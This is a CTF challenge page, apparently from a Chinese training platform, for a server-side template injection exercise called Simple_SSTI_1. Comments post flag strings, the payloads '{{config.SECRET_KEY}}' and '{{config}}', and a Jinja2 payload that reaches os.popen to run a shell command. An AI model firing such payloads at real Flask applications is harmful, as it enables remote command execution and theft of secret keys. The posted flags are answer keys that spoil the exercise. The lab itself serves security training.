Simple_SSTI_1WEB 未解决

分数: 5 金币: 2
题目作者: valecalida
一  血: dotast
一血奖励: 2金币
解  决: 28204
提  示:
描  述:
Simple_SSTI_1
评论
不懂就问 1年前

详细参考学习:https://blog.csdn.net/qq_36292543/article/details/136032550

回复 10

hejichang 1年前

flag{aced0e1bd96119f41a58510c28cfec11}

回复 0
用涉大川 1年前

每个人的flag都不一样,我的是flag{ddf1c0bc7f8ee46225efe4bf142c0079}

回复 0

ccsuaw 1年前

SECRET_KEY是什么? SECRET_KEY其实就是一个加密盐,用在django和flask的session、cookies等加密中。 所以payload为?flag={{config.SECRET_KEY}} 为什么是config.SECRET_KEY? 因为一般定义SECRET_KEY的config.py的源码是这样的: class Config(objec

回复 13

18483555203 1年前

flag{16346b3ff029db0cedd2d4d2df81df5a}

回复 0

2027347950 1年前

?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}

回复 1

iii1 1年前

?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}

回复 2

DragonWE 1年前

flag{9c260fb48e0a0db7708b6f3ebe9ff732}

回复 0

iain4048 1年前

查看源代码提示找secret key value

回复 0

13663536751 1年前

flag{e0ad0234936fcd15f11c7bb0f9d587e7}

回复 0
2346254613 1年前

这个是答案吗

回复 1

啊这这 1年前

使用{{config}}获得flag,因为config是用来获取当前配置的,配置主要有cookie名字和值之类的,这里的flag就是存放在cookie中(个人理解,如果不对请矫正)

回复 3

WriteUp

image
valecalida

5 金币

评分(49)

解题动态

hackerbugku 攻破了该题 2天前
nihaolmb 攻破了该题 3天前
gfzt 攻破了该题 3天前
124要留就要77 攻破了该题 4天前
王者荣耀 攻破了该题 5天前
dengsf2025 攻破了该题 7天前
奔跑小马 攻破了该题 7天前
wywitkey 攻破了该题 8天前
123zp 攻破了该题 9天前
yy56 攻破了该题 10天前
qxq233 攻破了该题 12天前
19212014671 攻破了该题 13天前
NNuuNN 攻破了该题 14天前
The-Beacon 攻破了该题 15天前
breeding 攻破了该题 15天前
REZE 攻破了该题 16天前
2424291112 攻破了该题 16天前
soulchild 攻破了该题 17天前
临渊 攻破了该题 17天前
Sudamasaki 攻破了该题 19天前
问题反馈